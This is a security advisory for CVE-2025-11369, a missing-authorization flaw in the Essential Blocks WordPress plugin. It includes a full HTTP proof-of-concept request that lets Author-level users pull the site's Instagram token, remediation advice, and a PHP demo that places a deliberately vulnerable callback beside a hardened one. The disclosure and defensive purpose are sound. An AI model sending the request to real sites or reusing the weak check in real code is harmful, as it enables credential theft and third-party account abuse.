CVE-2025-11369 impacts the WordPress plugin Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns (“Essential Blocks”) and is a classic Missing / Incorrect Capability Check issue that results in unauthorized access to sensitive configuration data. The vulnerability allows authenticated users with Author-level access and above to retrieve API keys and tokens configured for external services, because several plugin entry points validate only a weak or incorrect permission boundary rather than a strict administrative capability. Because Essential Blocks has a large deployment footprint (200,000+ active installations on WordPress.org), the real-world impact is not niche—multi-author sites that grant Author roles routinely (editors, guest authors, content teams) are exactly the environments where this exposure becomes operationally relevant.
| Field | Value |
|---|---|
| CVE | CVE-2025-11369 |
| Plugin version | Essential Blocks <= 5.7.2 |
| All-time downloads | 7 686 658 |
| Active installations | 200 000+ |
| Publicly published | December 16, 2025 |
| Last updated | December 16, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11369 <br> https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-blocks/essential-blocks-572-missing-authorization-to-authenticated-author-information-disclosure <br> https://t.me/cleantalk_researches/370 |
Timeline
| Date | Event |
|---|---|
| October 2, 2025 | Plugin testing and vulnerability detection in the Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns has been completed |
| October 2, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 16, 2025 | Registered CVE-2025-11369 |
Discovery of the Vulnerability
At a code-path level, the issue is driven by a set of AJAX callbacks and utility functions that are reachable from wp-admin contexts where non-admin roles can still load pages and read localized nonces. NVD attributes CVE-2025-11369 to missing or incorrect capability checks in get_instagram_access_token_callback, google_map_api_key_save_callback, and get_siteinfo, and explicitly states that these flaws allow authenticated attackers with Author-level access and above to view API keys configured for external services. The practical security mistake here is not “a nonce is exposed” (nonces are not secrets in the authorization sense), but that the endpoint treats possession of an admin-side nonce and a broad capability as sufficient authorization to reveal site-wide credentials – credentials that are not scoped to the requesting user and therefore must be protected by stronger privileges (typically administrator-only).
Understanding Missing Authorization attacks
In WordPress, “sensitive data exposure” frequently occurs when plugins conflate “can access a screen” with “can access the secrets configured on that screen,” especially in editorial environments where roles like Author can reach many wp-admin pages. API keys and tokens are particularly high-value because they are portable outside WordPress: once leaked, they can be reused from any machine, not just within the site, and they often map directly to quota, billing, or privileged API scopes. NVD categorizes CVE-2025-11369 under CWE-862 (Missing Authorization) and describes the outcome as unauthorized access to configured API keys. In real operational terms, an exposed Instagram access token can enable unauthorized API use and potentially data access depending on scopes, while a leaked Google Maps key can be abused for quota exhaustion or billing impact, and an Openverse-related key or fallback site identity values can aid targeted scraping or social engineering; in many organizations, these keys are shared across environments, making leakage from one WordPress site a stepping stone into broader abuse of the same third-party account.
Exploiting the Missing Authorization Vulnerability
To exploit CVE-2025-11369, an attacker holding a session cookie for an Author (or higher) account sends a single request to admin-ajax.php. The `admin_nonce` value is the plugin nonce an Author can read from an admin page they are already allowed to load (the placeholder below names profile.php); the nonce is not a secret, so it does not stop the request. The response returns the Instagram access token configured in the plugin.

PoC:

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/plugin-install.php?tab=popular&paged=8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 56
Origin: http://127.0.0.1
Connection: keep-alive
Cookie: Cookie of Author+
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=get_instagram_access_token&admin_nonce=nonce_from_profile.php
```
The most immediate impact of CVE-2025-11369 is credential compromise at the application layer: a low-privileged editorial account can extract third-party API credentials that were never intended to be visible outside administrators, and then reuse them externally. This creates a clean path to abuse that does not require compromising an admin account or bypassing authentication – any Author account (including a compromised one) becomes a credential-exfiltration pivot. NVD’s CVSS vector reflects a low-privilege requirement with confidentiality impact (credentials/keys disclosure) rather than direct integrity or availability compromise, which matches the core risk: secret leakage enables follow-on abuse that can escalate to business damage (quota/billing, content scraping, reputational harm) and can also be chained with other vulnerabilities by giving attackers more leverage and visibility into the environment and integrations. On sites with many authors (newsrooms, agencies, marketplaces with staff accounts), this is especially concerning because “Author” is often treated as semi-trusted, but not trusted enough to access site-wide integration secrets.
Recommendations for Improved Security
The durable fix is to enforce proper authorization boundaries: endpoints that reveal or manage site-wide credentials must require a high-privilege capability (commonly manage_options), and they should not treat a nonce plus edit_posts as sufficient to access secrets. NVD explicitly identifies the problem as missing/incorrect capability checks in the relevant callbacks, so the remediation should be framed as tightening those checks and ensuring that returned data is the minimum necessary for the caller's role; a raw token that is only ever used server-side never needs to reach the browser at all. Site owners should update to a patched version beyond the affected range (NVD: ≤ 5.7.2 is vulnerable), rotate any exposed keys/tokens (Instagram, Google Maps, Openverse) because once disclosed they must be treated as compromised, and audit role assignments so that only truly necessary users hold Author privileges. Because the plugin's active install base is large, defenders should also consider monitoring for admin-ajax.php calls to these actions from non-administrator sessions; note that the action name travels in the POST body, so this needs a WAF or audit plugin with request-body visibility rather than ordinary access logs. Implementing least-privilege separation for "integration configuration" tasks reduces the chance that a compromised editorial account can immediately turn into third-party credential theft.
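The following is an added example, not Essential Blocks code, illustrating the authorization pattern described in the Discovery section and the fix recommended above: an admin-ajax callback that accepts a nonce plus a broad capability as permission to reveal a site-wide token, beside a hardened version that gates on manage_options, returns only what the settings UI needs, and logs denied attempts as a monitoring signal. All names (the `demo_*` functions, the option key, the nonce action) are hypothetical; the WordPress API calls are real. The stubs at the top exist only so the file also runs under php-cli outside WordPress.

```php
<?php
/**
 * Added example (not plugin code). Vulnerable vs hardened admin-ajax callback
 * for a site-wide Instagram token. All demo_* names and option keys are
 * hypothetical; current_user_can, check_ajax_referer, get_option and
 * wp_send_json_* are the real WordPress functions.
 */

// Stubs so the file runs under php-cli outside WordPress. Inside WordPress
// these already exist and this block is skipped. Unlike the real
// wp_send_json_* functions, which emit JSON and exit, the stubs return the
// payload so the harness below can print it.
if (!function_exists('current_user_can')) {
    $GLOBALS['demo_caps'] = [];
    $GLOBALS['demo_options'] = [];
    function current_user_can(string $cap): bool {
        return in_array($cap, $GLOBALS['demo_caps'], true);
    }
    function get_current_user_id(): int { return 42; }
    function check_ajax_referer($action = -1, $query_arg = false, $stop = true) {
        // Real nonces are keyed HMACs tied to user and action; the stub
        // only checks that the parameter is present.
        return isset($_POST[$query_arg ?: '_wpnonce']) ? 1 : false;
    }
    function get_option(string $name, $default = false) {
        return $GLOBALS['demo_options'][$name] ?? $default;
    }
    function wp_send_json_success($data = null) {
        return ['success' => true, 'data' => $data];
    }
    function wp_send_json_error($data = null, $status_code = null) {
        return ['success' => false, 'data' => $data, 'status' => $status_code];
    }
}

// VULNERABLE pattern: the nonce proves the request came from an admin page
// the user could load; edit_posts proves only that the user may write posts
// (Authors hold it). Neither says the user may read site-wide secrets.
function demo_vulnerable_get_instagram_token() {
    check_ajax_referer('demo_admin_nonce', 'admin_nonce');
    if (!current_user_can('edit_posts')) {
        return wp_send_json_error('forbidden', 403);
    }
    return wp_send_json_success(['token' => get_option('demo_instagram_token', '')]);
}

// HARDENED pattern: integration secrets are an administrator concern, so
// gate on manage_options. The raw token is not handed to the browser at
// all; the block that talks to Instagram runs server-side and reads the
// option directly. The settings UI only needs to know a token is set.
function demo_hardened_get_instagram_token() {
    check_ajax_referer('demo_admin_nonce', 'admin_nonce');
    if (!current_user_can('manage_options')) {
        // Denied attempts by authenticated users are the signal worth
        // alerting on; the log line deliberately carries no secret.
        error_log(sprintf(
            'demo: user %d denied access to get_instagram_token',
            get_current_user_id()
        ));
        return wp_send_json_error('forbidden', 403);
    }
    $token = (string) get_option('demo_instagram_token', '');
    return wp_send_json_success([
        'configured' => $token !== '',
        'token_hint' => $token === '' ? '' : '...' . substr($token, -4),
    ]);
}

// Harness (php-cli only): call both callbacks as an Author and as an
// Administrator, with a constructed nonce and a constructed token.
if (PHP_SAPI === 'cli' && !defined('ABSPATH')) {
    $GLOBALS['demo_options']['demo_instagram_token'] = 'IGQVJ-constructed-token-7f3a';
    $_POST['admin_nonce'] = 'constructed-nonce';
    $roles = [
        'author'        => ['edit_posts'],
        'administrator' => ['edit_posts', 'manage_options'],
    ];
    foreach ($roles as $role => $caps) {
        $GLOBALS['demo_caps'] = $caps;
        printf("%-13s vulnerable: %s\n", $role, json_encode(demo_vulnerable_get_instagram_token()));
        printf("%-13s hardened:   %s\n", $role, json_encode(demo_hardened_get_instagram_token()));
    }
}
```

Run with `php demo.php`: the Author row shows the vulnerable callback returning the full token while the hardened one answers 403 and writes a log line; the Administrator row shows the hardened callback returning only `configured` and a four-character hint. In a real plugin both functions would be registered with `add_action('wp_ajax_<action>', ...)`; the capability check has to live inside the callback, because registering an action under `wp_ajax_` makes it reachable by every logged-in user regardless of role.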
By taking proactive measures to address Missing Authorization vulnerabilities like CVE-2025-11369 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
Dmitrii I.
